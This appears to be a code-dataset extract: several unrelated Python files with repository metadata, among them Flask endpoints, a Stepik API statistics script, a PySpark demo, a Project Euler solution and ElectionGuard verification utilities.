description='SuperTLD: Detecting TAD-like domains from RNA-associated interactions',
long_description=long_description, # loads your README.md
long_description_content_type="text/markdown", # README.md is of type 'markdown'
author='Yu Wei Zhang',
author_email='ywzhang224@gmail.com',
url='https://github.com/deepomicslab/SuperTLD',
packages=setuptools.find_packages(),
classifiers=[ # https://pypi.org/classifiers
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
],
) | 0 | 0 | 0 |
c8c4509d1f728af1884a6838160414be7ee31adb | 1,214 | py | Python | Server/view/stamp.py | getballaena/Get-Ballaena-Server | 7c04e31017f13608fab5a0b490d78f79336a2866 | [
"MIT"
] | null | null | null | Server/view/stamp.py | getballaena/Get-Ballaena-Server | 7c04e31017f13608fab5a0b490d78f79336a2866 | [
"MIT"
] | null | null | null | Server/view/stamp.py | getballaena/Get-Ballaena-Server | 7c04e31017f13608fab5a0b490d78f79336a2866 | [
"MIT"
] | null | null | null | from flask import jsonify, Response, request
from model import StampModel, CouponModel
from view import BaseResource
| 28.232558 | 77 | 0.571664 | from flask import jsonify, Response, request
from model import StampModel, CouponModel
from view import BaseResource
class StampMapView(BaseResource):
    """GET endpoint: every stamp with its position and the caller's capture state."""
    def get(self) -> Response:
        user = self.get_current_user()
        all_stamps = StampModel.get_all_stamps()
        stamp_map = [
            {
                'name': item.stamp_name,
                'is_captured': user.is_captured_stamp(stamp=item),
                'location': item.location,
                'x': item.x,
                'y': item.y,
            }
            for item in all_stamps
        ]
        return jsonify(stamp_map)
class StampCaptureView(BaseResource):
    """POST endpoint: mark the named stamp as captured by the current user.

    Status codes: 204 unknown stamp, 205 already captured,
    201 captured and set completed (coupon issued), 200 captured.
    """
    def post(self) -> Response:
        user = self.get_current_user()
        stamp = StampModel.get_stamp_by_stamp_name(request.json['stampName'])
        if stamp is None:
            return Response('', 204)
        if user.is_captured_stamp(stamp=stamp):
            return Response('', 205)
        user.capture_stamp(stamp=stamp)
        if user.is_captured_all_stamps():
            # full set collected: award the stamp-event coupon
            CouponModel.create(
                coupon_name='스탬프 이벤트 쿠폰',
                user=user,
            )
            return Response('', 201)
        return Response('', 200)
| 982 | 28 | 100 |
8b52f16235fdae18bffdc8d777431fd113a3d532 | 9,471 | py | Python | examples/plot_lesson_stats.py | alekspog/Stepik-API | 9d164d9dc5360e726205456c84404659409805b9 | [
"MIT"
] | 36 | 2016-12-12T18:33:10.000Z | 2021-11-12T12:18:37.000Z | examples/plot_lesson_stats.py | alekspog/Stepik-API | 9d164d9dc5360e726205456c84404659409805b9 | [
"MIT"
] | 20 | 2016-08-25T12:16:02.000Z | 2020-09-29T08:38:08.000Z | examples/plot_lesson_stats.py | alekspog/Stepik-API | 9d164d9dc5360e726205456c84404659409805b9 | [
"MIT"
] | 15 | 2016-08-25T09:57:26.000Z | 2022-03-12T07:33:21.000Z | # Run with Python 3
import requests
import pandas as pd
import math
import copy
'''This example demonstrates how to get lessons data via Stepik-API and why it can be useful.'''
'''We download lessons' data one by one,
then we make plots to see how much the loss of the people depends on the lesson time '''
plots_message = '<br /><hr>Plots describe how quantity of people who viewed, ' \
'passed and left depends on lesson duration.'
enable_russian = '<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> \n</head>'
welcome_message = 'Hi! <br><br> Click on public lessons to check them out. ' \
'<br><hr> List of existing lessons with id from {} to {}: <br> '
setting_css_style = '<style> \nli { float:left; width: 49%; } \nbr { clear: left; } \n</style>'
start_lesson_id = 1
finish_lesson_id = 100
# 1. Get your keys at https://stepik.org/oauth2/applications/ (client type = confidential,
# authorization grant type = client credentials)
client_id = "..."
client_secret = "..."
# 2. Get a token
auth = requests.auth.HTTPBasicAuth(client_id, client_secret)
resp = requests.post('https://stepik.org/oauth2/token/',
data={'grant_type': 'client_credentials'},
auth=auth
)
token = resp.json()['access_token']
# Class for drawing plots in text
def introduce_lessons_in_html(start, finish, json_of_lessons, html_file='lessons.html'):
"""
:param start: first id of lesson downloaded via API
:param finish: last id of lesson downloaded via API
:param json_of_lessons: json file we made by concatenating API answers that gave one-lesson-answer
:param html_file: file we write to
"""
with open(html_file, 'w', encoding='utf-8') as f:
# enabling russian language and setting html style for two-columns lists
f.write(enable_russian + setting_css_style)
f.write('<big>{}</big><ol>\n'.format(welcome_message.format(start, finish)))
for lesson in json_of_lessons:
if lesson['is_public']:
url = '<a href="https://stepik.org/lesson/{}">{}</a>'.format(lesson['slug'], lesson["title"])
f.write('<li>{}</li>\n'.format(url))
else:
f.write('<li>{}</li> \n'.format(lesson['title']))
f.write('</ol>\n')
f.close()
# 3. Call API (https://stepik.org/api/docs/) using this token.
# Example:
def get_lessons_from_n_to_m(from_n, to_m, current_token):
"""
:param from_n: starting lesson id
:param to_m: finish lesson id
:param current_token: token given by API
:return: json object with all existing lessons with id from from_n to to_m
"""
api_url = 'https://stepik.org/api/lessons/'
json_of_n_lessons = []
for n in range(from_n, to_m + 1):
try:
current_answer = (requests.get(api_url + str(n),
headers={'Authorization': 'Bearer ' + current_token}).json())
# check if lesson exists
if not ("detail" in current_answer):
json_of_n_lessons.append(current_answer['lessons'][0])
except:
print("Failure on id {}".format(n))
return json_of_n_lessons
def nan_to_zero(*args):
"""
:param args: lists with possible float-nan values
:return: same list with all nans replaced by 0
"""
for current_list in args:
for i in range(len(current_list)):
if not math.isnan(current_list[i]):
current_list[i] = round(current_list[i])
else:
current_list[i] = 0
if __name__ == '__main__':
# downloading lessons using API
json_of_lessons_being_analyzed = get_lessons_from_n_to_m(start_lesson_id, finish_lesson_id, token)
# storing the result in pandas DataFrame
lessons_data_frame = pd.DataFrame(json_of_lessons_being_analyzed)
# extracting the data needed
passed = lessons_data_frame['passed_by'].values
time_to_complete = lessons_data_frame['time_to_complete'].values
viewed = lessons_data_frame['viewed_by'].values
left = viewed - passed
# replacing data-slices by lists of their values
time_to_complete = time_to_complete.tolist()
viewed = viewed.tolist()
passed = passed.tolist()
left = left.tolist()
# replacing nan-values with 0 and rounding values
nan_to_zero(time_to_complete, viewed, passed, left)
# creating new Figure to make plots
figure1 = Figure(save_file='lessons.html')
# adding bar diagrams to Figure f1
figure1.add_barplot(time_to_complete, viewed, "X -- time to complete | Y - quantity of people who viewed")
figure1.add_barplot(time_to_complete, passed, "X -- time to complete | Y - quantity of people who passed")
figure1.add_barplot(time_to_complete, left, "X -- time to complete | Y - quantity of people who left")
# creating html-file describing lessons
introduce_lessons_in_html(start_lesson_id, finish_lesson_id, json_of_lessons_being_analyzed, 'lessons.html')
# saving plots (file is linked with Figure object f1)
figure1.save_plots_to_html()
| 41.539474 | 112 | 0.616302 | # Run with Python 3
import requests
import pandas as pd
import math
import copy
'''This example demonstrates how to get lessons data via Stepik-API and why it can be useful.'''
'''We download lessons' data one by one,
then we make plots to see how much the loss of the people depends on the lesson time '''
plots_message = '<br /><hr>Plots describe how quantity of people who viewed, ' \
'passed and left depends on lesson duration.'
enable_russian = '<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> \n</head>'
welcome_message = 'Hi! <br><br> Click on public lessons to check them out. ' \
'<br><hr> List of existing lessons with id from {} to {}: <br> '
setting_css_style = '<style> \nli { float:left; width: 49%; } \nbr { clear: left; } \n</style>'
start_lesson_id = 1
finish_lesson_id = 100
# 1. Get your keys at https://stepik.org/oauth2/applications/ (client type = confidential,
# authorization grant type = client credentials)
client_id = "..."
client_secret = "..."
# 2. Get a token
auth = requests.auth.HTTPBasicAuth(client_id, client_secret)
resp = requests.post('https://stepik.org/oauth2/token/',
data={'grant_type': 'client_credentials'},
auth=auth
)
token = resp.json()['access_token']
# Class for drawing plots in text
class Figure:
    """ASCII bar-plot canvas: collects bar plots and appends them to an HTML file."""
    def __init__(self, space_for_digits=10, rows=25, columns=120, bar_quantity_in_one_fifth_y=5,
                 underscore_quantity_in_one_fifth_x=20, divider_value=5, save_file='plot.html'):
        """
        :param space_for_digits: columns reserved on the left for OY axis labels
        :param rows: full quantity of bars (|) OY
        :param columns: full quantity of underscores (_) OX
        :param bar_quantity_in_one_fifth_y: how many bars (|) are in 1 of divider-value parts
        :param underscore_quantity_in_one_fifth_x: how many underscores (_) are in 1 of divider-value
        :param divider_value: how many parts axes are divided into
        :param save_file: html file where we save result
        """
        self.figure_matrix = []  # canvas: list of rows, each a list of 1-char cells
        self.rows = rows
        self.columns = columns
        self.space_for_digits = space_for_digits
        self.bar_quantity_y = bar_quantity_in_one_fifth_y
        self.underscore_quantity_x = underscore_quantity_in_one_fifth_x
        self.divider = divider_value
        self.file = save_file
        self.plot_matrix_list = []  # one {"matrix", "name"} entry per added plot
        # creating empty canvas
        for r in range(self.rows):  # rows
            self.figure_matrix.append([])  # add empty
            for c in range(self.columns + self.space_for_digits):  # each column
                self.figure_matrix[r].append(' ')
        # drawing axes: OX as a row of underscores, then the label row; OY as a '|' column
        self.figure_matrix.append(['_'] * (self.columns + self.space_for_digits))
        self.figure_matrix.append([' '] * (self.columns + self.space_for_digits))
        for row in self.figure_matrix:
            row[self.space_for_digits] = '|'
    def add_barplot(self, x_axe, y_axe, name="Plot"):
        """
        adds new bar matrix to plot_matrix_list
        :param x_axe - list of values X to put on OX axe
        :param y_axe: - list of values Y to put on OY axe
        :param name - title of this plot
        """
        if x_axe and y_axe:
            # calculating canvas params of current plot
            max_x = max(x_axe)
            max_y = max(y_axe)
            step_y = max_y // self.divider
            step_x = max_x // self.divider
            value_of_bar = step_y / self.bar_quantity_y  # data units per canvas row
            value_of_underscore = step_x / self.underscore_quantity_x  # data units per column
            current_plot_matrix = copy.deepcopy(self.figure_matrix)
            # drawing bars on figure_matrix canvas
            for point in range(len(x_axe)):
                current_x = x_axe[point]
                current_y = y_axe[point]
                if value_of_bar == 0:
                    y = max_y
                else:
                    y = round((max_y - current_y) // value_of_bar)
                if value_of_underscore == 0:
                    x = max_x
                else:
                    x = round(self.space_for_digits + current_x // value_of_underscore)
                # NOTE(review): 26 looks hardcoded to the default rows=25 (+1 axis
                # row); likely breaks for non-default `rows` — confirm
                for row_index in range(y, 26):
                    current_plot_matrix[row_index][x] = '*'
            i = 0
            # putting values on axe Y (max_y is consumed/decremented as labels are drawn)
            while max_y >= 0:
                for dig in range(len(str(max_y))):
                    current_plot_matrix[i][dig] = str(max_y)[dig]
                i += self.bar_quantity_y
                if max_y == step_y:
                    break
                max_y -= step_y
            # putting values on axe X
            i = self.space_for_digits
            x_value = 0
            while max_x >= x_value:
                for dig in range(len(str(x_value))):
                    current_plot_matrix[-1][i + dig] = str(x_value)[dig]
                i += self.underscore_quantity_x
                x_value += step_x
            # storing current plot in Figure field of all plots
            self.plot_matrix_list.append({"matrix": current_plot_matrix, "name": name})
    # saving plots given to html file (appends; relies on module-level plots_message)
    def save_plots_to_html(self):
        # NOTE(review): file handle is never closed — consider `with open(...)`
        f = open(self.file, 'a', encoding='utf-8')
        f.write('<big>{}</big>'.format(plots_message))
        for i in self.plot_matrix_list:
            f.write('<h2>{}</h2>\n<pre>'.format(i["name"]))
            for row in i["matrix"]:
                for symbol in row:
                    f.write(str(symbol))
                f.write('\n')
            f.write('\n\n')
            f.write('</pre><br>')
def introduce_lessons_in_html(start, finish, json_of_lessons, html_file='lessons.html'):
    """
    Write an HTML index of the downloaded lessons (overwrites html_file).

    :param start: first id of lesson downloaded via API
    :param finish: last id of lesson downloaded via API
    :param json_of_lessons: json file we made by concatenating API answers that gave one-lesson-answer
    :param html_file: file we write to
    """
    with open(html_file, 'w', encoding='utf-8') as f:
        # enabling russian language and setting html style for two-columns lists
        f.write(enable_russian + setting_css_style)
        f.write('<big>{}</big><ol>\n'.format(welcome_message.format(start, finish)))
        for lesson in json_of_lessons:
            if lesson['is_public']:
                # public lessons become clickable stepik.org links
                url = '<a href="https://stepik.org/lesson/{}">{}</a>'.format(lesson['slug'], lesson["title"])
                f.write('<li>{}</li>\n'.format(url))
            else:
                f.write('<li>{}</li> \n'.format(lesson['title']))
        f.write('</ol>\n')
        f.close()  # NOTE(review): redundant inside `with`; the context manager closes the file
# 3. Call API (https://stepik.org/api/docs/) using this token.
# Example:
def get_lessons_from_n_to_m(from_n, to_m, current_token):
    """
    :param from_n: starting lesson id
    :param to_m: finish lesson id
    :param current_token: token given by API
    :return: json object with all existing lessons with id from from_n to to_m
    """
    api_url = 'https://stepik.org/api/lessons/'
    json_of_n_lessons = []
    # hoisted loop invariant: same auth header for every request
    headers = {'Authorization': 'Bearer ' + current_token}
    for n in range(from_n, to_m + 1):
        try:
            current_answer = requests.get(api_url + str(n), headers=headers).json()
            # "detail" in the answer means the lesson does not exist / is not visible
            if "detail" not in current_answer:
                json_of_n_lessons.append(current_answer['lessons'][0])
        except Exception:  # was a bare except: don't swallow KeyboardInterrupt/SystemExit
            print("Failure on id {}".format(n))
    return json_of_n_lessons
def nan_to_zero(*args):
    """Sanitize numeric lists in place: NaNs become 0, other values are rounded.

    :param args: lists with possible float-nan values
    :return: None; each list is mutated in place
    """
    for values in args:
        for idx, value in enumerate(values):
            values[idx] = 0 if math.isnan(value) else round(value)
if __name__ == '__main__':
# downloading lessons using API
json_of_lessons_being_analyzed = get_lessons_from_n_to_m(start_lesson_id, finish_lesson_id, token)
# storing the result in pandas DataFrame
lessons_data_frame = pd.DataFrame(json_of_lessons_being_analyzed)
# extracting the data needed
passed = lessons_data_frame['passed_by'].values
time_to_complete = lessons_data_frame['time_to_complete'].values
viewed = lessons_data_frame['viewed_by'].values
left = viewed - passed
# replacing data-slices by lists of their values
time_to_complete = time_to_complete.tolist()
viewed = viewed.tolist()
passed = passed.tolist()
left = left.tolist()
# replacing nan-values with 0 and rounding values
nan_to_zero(time_to_complete, viewed, passed, left)
# creating new Figure to make plots
figure1 = Figure(save_file='lessons.html')
# adding bar diagrams to Figure f1
figure1.add_barplot(time_to_complete, viewed, "X -- time to complete | Y - quantity of people who viewed")
figure1.add_barplot(time_to_complete, passed, "X -- time to complete | Y - quantity of people who passed")
figure1.add_barplot(time_to_complete, left, "X -- time to complete | Y - quantity of people who left")
# creating html-file describing lessons
introduce_lessons_in_html(start_lesson_id, finish_lesson_id, json_of_lessons_being_analyzed, 'lessons.html')
# saving plots (file is linked with Figure object f1)
figure1.save_plots_to_html()
| 418 | 3,869 | 22 |
64b8b7ccdefb932d196593bd583873ca52de4f50 | 224 | py | Python | tests/baidu/test.py | marvinren/aiautomation | 639f57f502104dd170dca24dd9ff15d80c031e21 | [
"MIT"
] | null | null | null | tests/baidu/test.py | marvinren/aiautomation | 639f57f502104dd170dca24dd9ff15d80c031e21 | [
"MIT"
] | null | null | null | tests/baidu/test.py | marvinren/aiautomation | 639f57f502104dd170dca24dd9ff15d80c031e21 | [
"MIT"
] | null | null | null | from aiautomation.testcase.test_plan import TestPlanRunner, PlanInfo
plan = PlanInfo('4', '自动化测试', None
, None, '119', '1000', '0', '0')
t = TestPlanRunner(plan=plan)
t.add_case("百度搜索", "一般百度搜索")
t.start()
| 24.888889 | 68 | 0.642857 | from aiautomation.testcase.test_plan import TestPlanRunner, PlanInfo
plan = PlanInfo('4', '自动化测试', None
, None, '119', '1000', '0', '0')
t = TestPlanRunner(plan=plan)
t.add_case("百度搜索", "一般百度搜索")
t.start()
| 0 | 0 | 0 |
091205b0b2a4178f6f58de4ee9bd51c852db51c0 | 163 | py | Python | tests/test_calculator_module.py | tomhosking/pkg-example | 6bc887ef8a0992e7cc65d17abe4a690fc0a9a4d7 | [
"MIT"
] | 10 | 2020-04-24T12:43:24.000Z | 2020-05-06T07:19:33.000Z | tests/test_calculator_module.py | tomhosking/pkg-example | 6bc887ef8a0992e7cc65d17abe4a690fc0a9a4d7 | [
"MIT"
] | null | null | null | tests/test_calculator_module.py | tomhosking/pkg-example | 6bc887ef8a0992e7cc65d17abe4a690fc0a9a4d7 | [
"MIT"
] | 1 | 2020-04-29T12:40:34.000Z | 2020-04-29T12:40:34.000Z | from pkg_example.calculator_module import Calculator
| 23.285714 | 52 | 0.699387 | from pkg_example.calculator_module import Calculator
def test_double():
    """Calculator.double should double both ints and floats."""
    calc = Calculator()
    assert calc.double(3) == 6
    assert calc.double(3.0) == 6.0
| 87 | 0 | 23 |
a23f8b83ff0dbbfcaab3ab31c45989f156182b9e | 1,220 | py | Python | server_plugin/hello.py | Elovir/server_plugin | a56850725f0fdc8b358893fb7d4b8d6c6f03fcdf | [
"MIT"
] | null | null | null | server_plugin/hello.py | Elovir/server_plugin | a56850725f0fdc8b358893fb7d4b8d6c6f03fcdf | [
"MIT"
] | null | null | null | server_plugin/hello.py | Elovir/server_plugin | a56850725f0fdc8b358893fb7d4b8d6c6f03fcdf | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Minimal Flask server: a session check at /t and a plugin callback at /plugin.

Fix: the two route decorators below were left dangling (their view functions
had been stripped), which is a SyntaxError — the handler bodies are restored
here, matching the commented-out variants kept in this file.
"""
from flask import Flask, session, redirect, url_for, escape, request
import os

# Force a UTF-8 locale for anything this process spawns.
os.putenv('LANG', 'en_US.UTF-8')
os.putenv('LC_ALL', 'en_US.UTF-8')

app = Flask(__name__)


@app.route('/t')
def index():
    """Report the user stored in the session, if any."""
    if 'username' in session:
        return 'Logged in as %s' % escape(session['username'])
    return 'You are not logged in'


# @app.route('/')
# def index():
#     if 'username' in session:
#         return 'Logged in as %s' % escape(session['username'])
#     return 'You are not logged in'


@app.route('/plugin', methods=['GET', 'POST'])
def test():
    """Dump the incoming form payload to stdout and acknowledge receipt."""
    print("test")
    print(request.form)
    return "Received"


# @app.route('/login', methods=['GET', 'POST'])
# def login():
#     session['username'] = request.form['username']
#     return redirect(url_for('index'))
#     return '''
#         <form method="post">
#             <p><input type=text name=username>
#             <p><input type=submit value=Login>
#         </form>
#     '''


# @app.route('/logout')
# def logout():
#     # remove the username from the session if it's there
#     session.pop('username', None)
#     return redirect(url_for('index'))


if __name__ == "__main__":
    app.run()
| 23.921569 | 68 | 0.592623 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Minimal Flask server: a session check at /t and a plugin callback at /plugin.
from flask import Flask, session, redirect, url_for, escape, request
import os
# Force a UTF-8 locale for anything this process spawns.
os.putenv('LANG', 'en_US.UTF-8')
os.putenv('LC_ALL', 'en_US.UTF-8')
app = Flask(__name__)
@app.route('/t')
def index():
    """Report the user stored in the session, if any."""
    if 'username' in session:
        return 'Logged in as %s' % escape(session['username'])
    return 'You are not logged in'
# @app.route('/')
# def index():
#     if 'username' in session:
#         return 'Logged in as %s' % escape(session['username'])
#     return 'You are not logged in'
@app.route('/plugin', methods=['GET', 'POST'])
def test():
    """Dump the incoming form payload to stdout and acknowledge receipt."""
    print("test")
    print(request.form)
    return "Received"
# @app.route('/login', methods=['GET', 'POST'])
# def login():
#     session['username'] = request.form['username']
#     return redirect(url_for('index'))
#     return '''
#         <form method="post">
#             <p><input type=text name=username>
#             <p><input type=submit value=Login>
#         </form>
#     '''
# @app.route('/logout')
# def logout():
#     # remove the username from the session if it's there
#     session.pop('username', None)
#     return redirect(url_for('index'))
if __name__ == "__main__":
    app.run()
| 164 | 0 | 44 |
c98412ea0792f226057cb9e3d9d0d53f6b568adb | 1,039 | py | Python | storagelevel.py | nickyongzhang/pyspark_learning | 1942f7c9a2b23858903868c4b9accd9bcf5889ff | [
"Apache-2.0"
] | null | null | null | storagelevel.py | nickyongzhang/pyspark_learning | 1942f7c9a2b23858903868c4b9accd9bcf5889ff | [
"Apache-2.0"
] | null | null | null | storagelevel.py | nickyongzhang/pyspark_learning | 1942f7c9a2b23858903868c4b9accd9bcf5889ff | [
"Apache-2.0"
] | null | null | null | #! encoding=utf8
# Demo of choosing an RDD persistence level in PySpark.
# To decide the storage of RDD, there are different storage levels, which are given below -
# DISK_ONLY = StorageLevel(True, False, False, False, 1)
# DISK_ONLY_2 = StorageLevel(True, False, False, False, 2)
# MEMORY_AND_DISK = StorageLevel(True, True, False, False, 1)
# MEMORY_AND_DISK_2 = StorageLevel(True, True, False, False, 2)
# MEMORY_AND_DISK_SER = StorageLevel(True, True, False, False, 1)
# MEMORY_AND_DISK_SER_2 = StorageLevel(True, True, False, False, 2)
# MEMORY_ONLY = StorageLevel(False, True, False, False, 1)
# MEMORY_ONLY_2 = StorageLevel(False, True, False, False, 2)
# MEMORY_ONLY_SER = StorageLevel(False, True, False, False, 1)
# MEMORY_ONLY_SER_2 = StorageLevel(False, True, False, False, 2)
# OFF_HEAP = StorageLevel(True, True, True, False, 1)
from pyspark import SparkContext
import pyspark
# Local (single-JVM) context; second argument is the application name.
sc = SparkContext (
"local",
"storagelevel app"
)
rdd1 = sc.parallelize([1,2])
# Keep the RDD in memory, spill to disk when needed, replicate twice.
rdd1.persist( pyspark.StorageLevel.MEMORY_AND_DISK_2 )
# NOTE(review): the return value of this bare call is discarded — the printed
# lookup of the same value follows it in the original file.
rdd1.getStorageLevel()
print(rdd1.getStorageLevel()) | 30.558824 | 91 | 0.741097 | #! encoding=utf8
# Demo of choosing an RDD persistence level in PySpark.
# To decide the storage of RDD, there are different storage levels, which are given below -
# DISK_ONLY = StorageLevel(True, False, False, False, 1)
# DISK_ONLY_2 = StorageLevel(True, False, False, False, 2)
# MEMORY_AND_DISK = StorageLevel(True, True, False, False, 1)
# MEMORY_AND_DISK_2 = StorageLevel(True, True, False, False, 2)
# MEMORY_AND_DISK_SER = StorageLevel(True, True, False, False, 1)
# MEMORY_AND_DISK_SER_2 = StorageLevel(True, True, False, False, 2)
# MEMORY_ONLY = StorageLevel(False, True, False, False, 1)
# MEMORY_ONLY_2 = StorageLevel(False, True, False, False, 2)
# MEMORY_ONLY_SER = StorageLevel(False, True, False, False, 1)
# MEMORY_ONLY_SER_2 = StorageLevel(False, True, False, False, 2)
# OFF_HEAP = StorageLevel(True, True, True, False, 1)
from pyspark import SparkContext
import pyspark
# Local (single-JVM) context; second argument is the application name.
sc = SparkContext (
"local",
"storagelevel app"
)
rdd1 = sc.parallelize([1,2])
# Keep the RDD in memory, spill to disk when needed, replicate twice.
rdd1.persist( pyspark.StorageLevel.MEMORY_AND_DISK_2 )
# NOTE(review): the return value of this bare call is discarded — the printed
# lookup of the same value follows it in the original file.
rdd1.getStorageLevel()
print(rdd1.getStorageLevel()) | 0 | 0 | 0 |
ffad4729a0ab2ddd177f2677d26fcdeafd55e261 | 1,504 | py | Python | python/8.py | dpetker/project-euler | d232367d5f21821871c53d6ecc43c8d6af801d2c | [
"MIT"
] | null | null | null | python/8.py | dpetker/project-euler | d232367d5f21821871c53d6ecc43c8d6af801d2c | [
"MIT"
] | null | null | null | python/8.py | dpetker/project-euler | d232367d5f21821871c53d6ecc43c8d6af801d2c | [
"MIT"
] | null | null | null | # Soultion for Project Euler Problem #8 - https://projecteuler.net/problem=8
# (c) 2017 dpetker
# Fixes: (1) multiply_range was referenced but never defined in this copy
# (NameError); it is restored below. (2) the scan's upper bound was
# len(TEST_VAL) - 13, which skipped the final 13-digit window — it is now
# len(TEST_VAL) - 12 so every window is examined.
TEST_VAL = '7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450'

def multiply_range(test_str):
    """Return the product of the individual digits in `test_str` (1 if empty)."""
    curr_prod = 1
    for c in test_str:
        curr_prod *= int(c)
    return curr_prod

curr_max = 0
# Slide a 13-digit window across the whole 1000-digit number.
for ctr in range(0, len(TEST_VAL) - 12):
    temp_prod = multiply_range(TEST_VAL[ctr : ctr + 13])
    if temp_prod > curr_max:
        curr_max = temp_prod

print('The thirteen adjacent digits in the 1000-digit number that have the greatest product is {}'.format(curr_max))
| 71.619048 | 1,013 | 0.90359 | # Soultion for Project Euler Problem #8 - https://projecteuler.net/problem=8
# (c) 2017 dpetker
TEST_VAL = '7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450'
curr_max = 0
def multiply_range(test_str):
    """Return the product of the individual digits in `test_str` (1 if empty)."""
    product = 1
    for digit in test_str:
        product *= int(digit)
    return product
# Slide a 13-digit window across the whole number. Fix: the original upper
# bound of len(TEST_VAL) - 13 excluded the final window (starting at index
# len - 13); len(TEST_VAL) - 12 makes the scan cover every window.
for ctr in range(0, len(TEST_VAL) - 12):
    temp_prod = multiply_range(TEST_VAL[ctr : ctr + 13])
    if temp_prod > curr_max:
        curr_max = temp_prod
print('The thirteen adjacent digits in the 1000-digit number that have the greatest product is {}'.format(curr_max))
| 89 | 0 | 23 |
6eac3541878bf8483397909868c0b94d72499820 | 4,733 | py | Python | electionguard_verify/utils.py | nickboucher/PyVerify | 42f7aacaafc2455922e1c0b89d9a45e2b0e17915 | [
"MIT"
] | 1 | 2020-11-30T02:04:18.000Z | 2020-11-30T02:04:18.000Z | electionguard_verify/utils.py | nickboucher/electionguard-verify | 42f7aacaafc2455922e1c0b89d9a45e2b0e17915 | [
"MIT"
] | null | null | null | electionguard_verify/utils.py | nickboucher/electionguard-verify | 42f7aacaafc2455922e1c0b89d9a45e2b0e17915 | [
"MIT"
] | null | null | null | """ utils.py
Nicholas Boucher 2020
Utility functions for assisting in election verification
calculations.
"""
from typing import TypeVar, Iterable
from logging import info, warning
from electionguard.group import ElementModP, int_to_p
from electionguard.election import ElectionDescription, ContestDescription
from electionguard.ballot import CiphertextAcceptedBallot, CiphertextBallotContest, CiphertextBallotSelection
from electionguard.key_ceremony import CoefficientValidationSet
T: TypeVar = TypeVar('T')
class Invariants():
    """Represents a series of conditions that must all hold for the
    collection of invariants to remain valid."""
    title: str
    conditions: dict[str, bool]

    def __init__(self, title: str):
        """Instantiate a new set of invariants collectively labelled `title`."""
        self.title = title
        self.conditions = {}

    def ensure(self, invariant: str, condition: bool) -> bool:
        """Track the truthiness of `condition` for the invariant labelled `invariant`."""
        # An invariant that has failed once stays failed, whatever comes later.
        self.conditions[invariant] = self.conditions.get(invariant, True) and condition
        return condition

    def validate(self) -> bool:
        """Return whether all conditions are valid, logging the results."""
        failed = [name for name, ok in self.conditions.items() if not ok]
        if not failed:
            info(f'[VALID]: {self.title}')
            return True
        info(f'[INVALID]: {self.title}')
        info(''.join(f'\t\tFailed to validate invariant {name}.\n' for name in failed))
        return False
class Contests():
    """Speeds up access to contest descriptions through object_id indexing."""
    contests: dict[str,ContestDescription]

    def __init__(self, description: ElectionDescription):
        """Indexes contest descriptions by object_id for quick lookups."""
        self.contests = {contest.object_id: contest for contest in description.contests}

    def __getitem__(self, contest: str) -> ContestDescription:
        """Returns the requested contest, or None if no such contest exists."""
        # dict.get already yields None for unknown ids — one lookup instead of two.
        return self.contests.get(contest)
class Guardians():
    """Speeds up access to guardians through owner_id indexing."""
    guardians: dict[str,CoefficientValidationSet]

    def __init__(self, guardians: Iterable[CoefficientValidationSet]):
        """Indexes guardians by owner_id for quick lookups."""
        self.guardians = {}
        for guardian in guardians:
            self.guardians[guardian.owner_id] = guardian

    # Fixed: the return annotation previously said ContestDescription (a
    # copy-paste from Contests); this container stores and returns
    # CoefficientValidationSet entries.
    def __getitem__(self, guardian: str) -> CoefficientValidationSet:
        """Returns the requested guardian, or None if no such guardian exists."""
        return self.guardians.get(guardian)
def get_first_el(els: list[T]) -> T:
    """Returns the first element of `els`, or None if it is empty."""
    return els[0] if els else None
def get_contest(ballot: CiphertextAcceptedBallot, contest_id: str) -> CiphertextBallotContest:
    """Given a ballot, gets the supplied contest. If the contest appears more than once,
    None is returned."""
    result: CiphertextBallotContest = None
    for contest in ballot.contests:
        if contest.object_id == contest_id:
            # Identity comparison (`is not None`) replaces `!= None`, per PEP 8.
            if result is not None:
                warn('Ballot contains multiple entries for the same contest.')
                return None
            result = contest
    return result
def get_selection(ballot: CiphertextAcceptedBallot, contest_id: str, selection_id: str) -> CiphertextBallotSelection:
    """Given a ballot, gets the supplied selection from within the supplied contest.
    If the contest or selection appear more than once, None is returned."""
    result: CiphertextBallotSelection = None
    contest: CiphertextBallotContest = get_contest(ballot, contest_id)
    if contest:
        for selection in contest.ballot_selections:
            if selection.object_id == selection_id:
                # Identity comparison (`is not None`) replaces `!= None`, per PEP 8.
                if result is not None:
                    warn('Ballot contains multiple entries for the same selection.')
                    return None
                result = selection
    return result
def warn(msg: str) -> None:
"""Emits a warning message `msg` to the logs."""
warning(f'[WARNING]: {msg}') | 37.267717 | 117 | 0.654764 | """ utils.py
Nicholas Boucher 2020
Utility functions for assisting in election verification
calculations.
"""
from typing import TypeVar, Iterable
from logging import info, warning
from electionguard.group import ElementModP, int_to_p
from electionguard.election import ElectionDescription, ContestDescription
from electionguard.ballot import CiphertextAcceptedBallot, CiphertextBallotContest, CiphertextBallotSelection
from electionguard.key_ceremony import CoefficientValidationSet
